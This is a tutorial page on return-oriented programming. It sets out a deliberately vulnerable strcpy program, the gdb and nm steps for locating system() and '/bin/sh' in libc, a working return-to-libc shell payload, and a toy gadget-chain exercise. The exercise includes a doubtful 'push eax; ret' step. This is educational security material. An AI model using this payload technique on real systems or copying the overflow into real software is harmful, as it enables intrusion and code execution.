Dies ist eine alte Version des Dokuments!


Return-oriented Programming (ROP)

In the previous chapters the usage of existing functions as well as custom shellcode as execution target were discussed. As using existing functions is rather inflexible and there are several protection mechanisms avoiding the injection of custom executable code, an advanced exploitation approach is required. While a very simple ROP exploit was actually already used to redirect execution to an existing function without parameters, this chapter will explain the concept in more detail.

Return-to-libc

Following vulnerable example code is considered in this section.

rop_libc.c
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 rop_libc.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

The application to be exploited is very small and contains no function to redirect execution to. However, at runtime we have the code of all linked shared libraries available. Due to the fact that libc is available on almost every system, it is an omnipresent code base for attacks. Executing arbitrary shell commands, calling the system() function is a promising target for redirecting execution to. The only requirement when returning into system() is to pass the command to be executed as first parameter.

ldd is used to find out the address of the library when loaded for the example application.

$ ldd a.out
    linux-gate.so.1 (0xf7fd7000)
    libc.so.6 => /lib32/libc.so.6 (0xf7df9000)
    /lib/ld-linux.so.2 (0xf7fd9000)

Assuming an operating system having ASLR disabled, 0xf7df9000 is the address of the library after being loaded, but the offset of the system() function within the library still needs to be found out. nm is used to find the address of the system() function.

$ nm -D /lib32/libc.so.6 | grep system
0003a850 T __libc_system
00113c60 T svcerr_systemerr
0003a850 W system

Adding up the library offset 0xf7df9000 and the function offset 0x0003a850, results in an absolute address of 0xf7e33850. The final piece of the exploit is the parameter for system(). Luckily, libc contains a „/bin/sh“ string. gdb is used to find the address of this string.

Load the application into the debugger and set a breakpoint in the main function. Start the application and wait for the breakpoint to be hit.

$ gdb -q a.out 
Reading symbols from a.out...done.
(gdb) break main
Breakpoint 1 at 0x804843c: file rop_libc.c, line 7.
(gdb) run
Starting program: /home/memory-corruption/a.out 

Breakpoint 1, main (argc=1, argv=0xffffd414) at rop_libc.c:7
7	    char buffer[8] = {0};

Restricting the search for the string to the library, the start and end addresses need to be known. Although the start address was already discovered via ldd, the end address is still unknown. Using gdb, access to the address mapping of shared libraries is quite easy.

(gdb) info proc mappings 
process 2955
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/memory-corruption/a.out
	 0x8049000  0x804a000     0x1000        0x0 /home/memory-corruption/a.out
	 0x804a000  0x804b000     0x1000     0x1000 /home/memory-corruption/a.out
	0xf7df7000 0xf7df9000     0x2000        0x0 
	0xf7df9000 0xf7faa000   0x1b1000        0x0 /lib32/libc-2.24.so
	0xf7faa000 0xf7fac000     0x2000   0x1b0000 /lib32/libc-2.24.so
	0xf7fac000 0xf7fad000     0x1000   0x1b2000 /lib32/libc-2.24.so
	0xf7fad000 0xf7fb0000     0x3000        0x0 
	0xf7fd2000 0xf7fd4000     0x2000        0x0 
	0xf7fd4000 0xf7fd7000     0x3000        0x0 [vvar]
	0xf7fd7000 0xf7fd9000     0x2000        0x0 [vdso]
	0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib32/ld-2.24.so
	0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib32/ld-2.24.so
	0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib32/ld-2.24.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]

It can be concluded, that the end address of libc is 0xf7fad000. These restrictions are now used to search for the „/bin/sh“ string.

(gdb) find 0xf7df9000,0xf7fad000,"/bin/sh"
0xf7f55cc8
1 pattern found.

The structure of the payload is as follows. 8 bytes of the buffer need to be filled up. Next, the 4 bytes of the saved EBP need to skipped as well. The return address is overwritten with the address of system(). In order to maintain a correct stack frame layout and offset, a dummy return address for system() is required. Finally, the address of „/bin/sh“ is added as the parameter to system(). Passing this payload to the program, spawns a command shell.

$ ./a.out $(echo -en "AAAAAAAABBBB\x50\x38\xe3\xf7CCCC\xc8\x5c\xf5\xf7")
$

ROP Chains

System calls expect parameters not on the stack but in registers. Because registers cannot directly be overwritten by using a buffer overflow, the above concept does not apply to them. Furthermore, the x64 architecture applies the usage of registers as parameter memory also to function calls and not only system calls.

Taking the concept of return-to-libc one step further, instead of a single function several code chunks are used. Thus the exploit payload consists of multiple return addresses pointing to small code chunks terminated by a ret instruction each. These code chunks are commonly called „gadgets“. Concatenating them together results in a so-called „ROP chain“. Note that the instruction sequence of a gadget does not necessarily need to be valid code with respect to the original application. As shown in the chapter about NOP sleds, inspecting opcodes at a varying offset also changes their meaning and resulting instructions.

Toy Example

Before jumping into a real-world example application, a toy example will be presented to further illustrate the basic concept. Following gadgets are assumed to be available.

; Gadget 1
xor eax, eax
ret
; Gadget 2
inc eax
ret
; Gadget 3
mov ebx, eax
ret
; Gadget 4
pop ecx
pop edx
ret
; Gadget 5
push eax
ret
; Gadget 6
inc ecx
ret

The goal is to reach the following register state:

  • EAX = 3
  • EBX = 2
  • ECX = 1
  • EDX = 0

There are several gadget sequences to reach the destination state. One solution sequence is listed below.

Gadget 1
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined

Gadget 4
EAX = 0, EBX = undefined, ECX = 0, EDX = 0

Gadget 6
EAX = 0, EBX = undefined, ECX = 1, EDX = 0

Gadget 2
EAX = 1, EBX = undefined, ECX = 1, EDX = 0

Gadget 2
EAX = 2, EBX = undefined, ECX = 1, EDX = 0

Gadget 3
EAX = 2, EBX = 2, ECX = 1, EDX = 0

Gadget 2
EAX = 3, EBX = 2, ECX = 1, EDX = 0